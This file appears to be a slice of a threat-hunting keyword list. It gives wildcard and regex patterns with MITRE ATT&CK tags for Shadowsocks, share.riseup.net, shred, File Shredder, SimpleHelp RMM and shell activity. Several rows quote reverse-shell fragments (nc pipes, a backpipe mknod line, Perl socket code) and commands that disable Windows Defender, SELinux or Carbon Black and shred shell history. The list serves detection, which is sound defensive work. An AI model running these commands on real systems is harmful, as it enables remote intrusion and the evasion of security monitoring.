"*e3584150cc2cc74f7582e84f91ae9c258e63b67e722b0219a6378212c03ee85a*",".{0,1000}e3584150cc2cc74f7582e84f91ae9c258e63b67e722b0219a6378212c03ee85a.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*e6225af4ab483e49445f0021bc05efc405e544e7a725eb6ecb3f8777a8783109*",".{0,1000}e6225af4ab483e49445f0021bc05efc405e544e7a725eb6ecb3f8777a8783109.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*e6fe3c2968b235f58bdd9b5e0d1eefafb1e577c9fc7a533eb88e198d11773b2d*",".{0,1000}e6fe3c2968b235f58bdd9b5e0d1eefafb1e577c9fc7a533eb88e198d11773b2d.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*e9fad6bcba22427d7efb3d9b341d11173659a06cc12670ba9d542aeb670284b8*",".{0,1000}e9fad6bcba22427d7efb3d9b341d11173659a06cc12670ba9d542aeb670284b8.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*EA1FB2D4-B5A7-47A6-B097-2F4D29E23010*",".{0,1000}EA1FB2D4\-B5A7\-47A6\-B097\-2F4D29E23010.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#GUIDproject","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*f3cb648c848b10ea67fe776ed08f1de7258d3e3e4f1b9a5779ecd500de9e9dd0*",".{0,1000}f3cb648c848b10ea67fe776ed08f1de7258d3e3e4f1b9a5779ecd500de9e9dd0.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*f5f1aeff01f602aca4aa2da893395b2ae6552325e46ffe31c267ae5494558c8e*",".{0,1000}f5f1aeff01f602aca4aa2da893395b2ae6552325e46ffe31c267ae5494558c8e.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*F60CD6D5-4B1C-4293-829E-9C10D21AE8A3*",".{0,1000}F60CD6D5\-4B1C\-4293\-829E\-9C10D21AE8A3.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#GUIDproject","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*privoxy_UID.conf*",".{0,1000}privoxy_UID\.conf.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*Shadowsocks Local Service*",".{0,1000}Shadowsocks\sLocal\sService.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","Servicename","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z"
"*Shadowsocks started TCP*",".{0,1000}Shadowsocks\sstarted\sTCP.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*Shadowsocks started UDP*",".{0,1000}Shadowsocks\sstarted\sUDP.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*Shadowsocks.PAC.*",".{0,1000}Shadowsocks\.PAC\..{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*Shadowsocks.Protocol*",".{0,1000}Shadowsocks\.Protocol.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","1","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*Shadowsocks.WPF*",".{0,1000}Shadowsocks\.WPF.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*shadowsocks/shadowsocks-rust*",".{0,1000}shadowsocks\/shadowsocks\-rust.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","1","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z"
"*shadowsocks/shadowsocks-windows*",".{0,1000}shadowsocks\/shadowsocks\-windows.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","1","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*shadowsocks/ssserver-rust*",".{0,1000}shadowsocks\/ssserver\-rust.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","1","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z"
"*SHADOWSOCKS_CONFIG_PATH*",".{0,1000}SHADOWSOCKS_CONFIG_PATH.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z"
"*SHADOWSOCKS6_CONFIG_PATH*",".{0,1000}SHADOWSOCKS6_CONFIG_PATH.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z"
"*shadowsocks-local-service*",".{0,1000}shadowsocks\-local\-service.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","Servicename","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z"
"*shadowsocks-rust-local@*",".{0,1000}shadowsocks\-rust\-local\@.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z"
"*shadowsocks-rust-server@*",".{0,1000}shadowsocks\-rust\-server\@.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z"
"*snap.shadowsocks-rust.sslocal-daemon.service*",".{0,1000}snap\.shadowsocks\-rust\.sslocal\-daemon\.service.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z"
"*ss_privoxy.exe*",".{0,1000}ss_privoxy\.exe.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","1","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*https://share.riseup.net/2*",".{0,1000}https\:\/\/share\.riseup\.net\/2.{0,1000}","greyware_tool_keyword","share.riseup.net","temporary file hosting service - abused by attackers to share informations with their victims","T1105 - T1071","TA0010 - TA0009","N/A","Avos","Collection","https://share.riseup.net","1","1","N/A","downloading files url","10","10","N/A","N/A","N/A","N/A"
"*https://share.riseup.net/up*",".{0,1000}https\:\/\/share\.riseup\.net\/up.{0,1000}","greyware_tool_keyword","share.riseup.net","temporary file hosting service - abused by attackers to share informations with their victims","T1105 - T1071","TA0010 - TA0009","N/A","Avos","Data Exfiltration","https://share.riseup.net","1","1","N/A","uploading files url","10","10","N/A","N/A","N/A","N/A"
"*/bin/sh | nc*",".{0,1000}\/bin\/sh\s\|\snc.{0,1000}","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","8034","2149","2024-08-29T18:41:50Z","2016-12-24T09:48:49Z"
"*/bin/sh -i <&3 >&3 2>&3*",".{0,1000}\/bin\/sh\s\-i\s\<\&3\s\>\&3\s2\>\&3.{0,1000}","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","8034","2149","2024-08-29T18:41:50Z","2016-12-24T09:48:49Z"
"*rm -f backpipe* mknod /tmp/backpipe p && nc *",".{0,1000}rm\s\-f\sbackpipe.{0,1000}\smknod\s\/tmp\/backpipe\sp\s\&\&\snc\s.{0,1000}","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","8034","2149","2024-08-29T18:41:50Z","2016-12-24T09:48:49Z"
"*sc config WinDefend start= disabled*",".{0,1000}sc\sconfig\sWinDefend\sstart\=\sdisabled.{0,1000}","greyware_tool_keyword","shell","Defense evasion technique In order to avoid detection at any point of the kill chain. attackers use several ways to disable anti-virus. disable Microsoft firewall and clear logs.","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*schkconfig off cbdaemon*","schkconfig\soff\scbdaemon","greyware_tool_keyword","shell","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*service cbdaemon stop*","service\scbdaemon\sstop","greyware_tool_keyword","shell","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*socket(S*PF_INET*SOCK_STREAM*getprotobyname(*tcp*))*if(connect(S*sockaddr_in($p*inet_aton($i))))*",".{0,1000}socket\(S.{0,1000}PF_INET.{0,1000}SOCK_STREAM.{0,1000}getprotobyname\(.{0,1000}tcp.{0,1000}\)\).{0,1000}if\(connect\(S.{0,1000}sockaddr_in\(\$p.{0,1000}inet_aton\(\$i\)\)\)\).{0,1000}","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","1","N/A","greyware tool - risks of False positive !","N/A","10","8034","2149","2024-08-29T18:41:50Z","2016-12-24T09:48:49Z"
"*STDIN->fdopen($c*r)*$~->fdopen($c*w)*system$_ while<>*",".{0,1000}STDIN\-\>fdopen\(\$c.{0,1000}r\).{0,1000}\$\~\-\>fdopen\(\$c.{0,1000}w\).{0,1000}system\$_\swhile\<\>.{0,1000}","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","8034","2149","2024-08-29T18:41:50Z","2016-12-24T09:48:49Z"
"*uname -a* w* id* /bin/bash -i*",".{0,1000}uname\s\-a.{0,1000}\sw.{0,1000}\sid.{0,1000}\s\/bin\/bash\s\-i.{0,1000}","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","8034","2149","2024-08-29T18:41:50Z","2016-12-24T09:48:49Z"
"setenforce 0","setenforce\s0","greyware_tool_keyword","shell","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*shred $HISTFILE*",".{0,1000}shred\s\$HISTFILE.{0,1000}","greyware_tool_keyword","shred","deleting bash history","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*shred --remove*",".{0,1000}shred\s\-\-remove.{0,1000}","greyware_tool_keyword","shred","Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.","T1070.004 - T1564.001 - T1027","TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z"
"*shred -u*",".{0,1000}shred\s\-u.{0,1000}","greyware_tool_keyword","shred","Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.","T1070.004 - T1564.001 - T1027","TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z"
"*shred -z*",".{0,1000}shred\s\-z.{0,1000}","greyware_tool_keyword","shred","Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.","T1070.004 - T1564.001 - T1027","TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z"
"*shred --zero*",".{0,1000}shred\s\-\-zero.{0,1000}","greyware_tool_keyword","shred","Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.","T1070.004 - T1564.001 - T1027","TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z"
"*\file_shredder_setup.tmp*",".{0,1000}\\file_shredder_setup\.tmp.{0,1000}","greyware_tool_keyword","Shredder","File Shredder is FREE and powerfull aplication to shred and permanently remove unwanted files from your computer beyond recovery","T1070 - T1485 - T1565.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://www.fileshredder.org/","1","0","N/A","N/A","7","8","N/A","N/A","N/A","N/A"
"*\Shredder.exe*",".{0,1000}\\Shredder\.exe.{0,1000}","greyware_tool_keyword","Shredder","File Shredder is FREE and powerfull aplication to shred and permanently remove unwanted files from your computer beyond recovery","T1070 - T1485 - T1565.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://www.fileshredder.org/","1","0","N/A","N/A","7","8","N/A","N/A","N/A","N/A"
"*>File Shredder by PowTools<*",".{0,1000}\>File\sShredder\sby\sPowTools\<.{0,1000}","greyware_tool_keyword","Shredder","File Shredder is FREE and powerfull aplication to shred and permanently remove unwanted files from your computer beyond recovery","T1070 - T1485 - T1565.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://www.fileshredder.org/","1","0","N/A","N/A","7","8","N/A","N/A","N/A","N/A"
"*File Shredder setup.exe*",".{0,1000}File\sShredder\ssetup\.exe.{0,1000}","greyware_tool_keyword","Shredder","File Shredder is FREE and powerfull aplication to shred and permanently remove unwanted files from your computer beyond recovery","T1070 - T1485 - T1565.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://www.fileshredder.org/","1","1","N/A","N/A","7","8","N/A","N/A","N/A","N/A"
"*File Shredder.exe*",".{0,1000}File\sShredder\.exe.{0,1000}","greyware_tool_keyword","Shredder","File Shredder is FREE and powerfull aplication to shred and permanently remove unwanted files from your computer beyond recovery","T1070 - T1485 - T1565.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://www.fileshredder.org/","1","1","N/A","N/A","7","8","N/A","N/A","N/A","N/A"
"*file_shredder_setup.exe*",".{0,1000}file_shredder_setup\.exe.{0,1000}","greyware_tool_keyword","Shredder","File Shredder is FREE and powerfull aplication to shred and permanently remove unwanted files from your computer beyond recovery","T1070 - T1485 - T1565.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://www.fileshredder.org/","1","1","N/A","N/A","7","8","N/A","N/A","N/A","N/A"
"*Program Files\File Shredder\*",".{0,1000}Program\sFiles\\File\sShredder\\.{0,1000}","greyware_tool_keyword","Shredder","File Shredder is FREE and powerfull aplication to shred and permanently remove unwanted files from your computer beyond recovery","T1070 - T1485 - T1565.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://www.fileshredder.org/","1","0","N/A","N/A","7","8","N/A","N/A","N/A","N/A"
"*""SimpleHelp Remote Printer""*",".{0,1000}\""SimpleHelp\sRemote\sPrinter\"".{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/simplehelper64.exe*",".{0,1000}\/simplehelper64\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\JWrapper-SimpleHelp Remote Work*",".{0,1000}\\JWrapper\-SimpleHelp\sRemote\sWork.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\JWrapper-SimpleHelp Technician*",".{0,1000}\\JWrapper\-SimpleHelp\sTechnician.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\JWrapper-SimpleHelp Technician\*",".{0,1000}\\JWrapper\-SimpleHelp\sTechnician\\.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Programs\SimpleHelp Remote Work""*",".{0,1000}\\Programs\\SimpleHelp\sRemote\sWork\"".{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\Programs\SimpleHelp Technician*",".{0,1000}\\Programs\\SimpleHelp\sTechnician.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\remote access session.exe*",".{0,1000}\\remote\saccess\ssession\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\remote access.exe*",".{0,1000}\\remote\saccess\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Remote AccessEmbedExample.html*",".{0,1000}\\Remote\sAccessEmbedExample\.html.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Remote Access-java-online.jar*",".{0,1000}\\Remote\sAccess\-java\-online\.jar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\remote support.exe*",".{0,1000}\\remote\ssupport\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Remote SupportEmbedExample.html*",".{0,1000}\\Remote\sSupportEmbedExample\.html.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\remoteaccess-jar-with-dependencies.jar*",".{0,1000}\\remoteaccess\-jar\-with\-dependencies\.jar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\SafeBoot\Network\ShTemporaryService*",".{0,1000}\\SafeBoot\\Network\\ShTemporaryService.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\SafeBoot\Network\SimpleHelp Server*",".{0,1000}\\SafeBoot\\Network\\SimpleHelp\sServer.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\Services\SimpleHelp Server*",".{0,1000}\\Services\\SimpleHelp\sServer.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\simplegateway.service""*",".{0,1000}\\simplegateway\.service\"".{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\SimpleHelp TechnicianEmbedExample.html*",".{0,1000}\\SimpleHelp\sTechnicianEmbedExample\.html.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
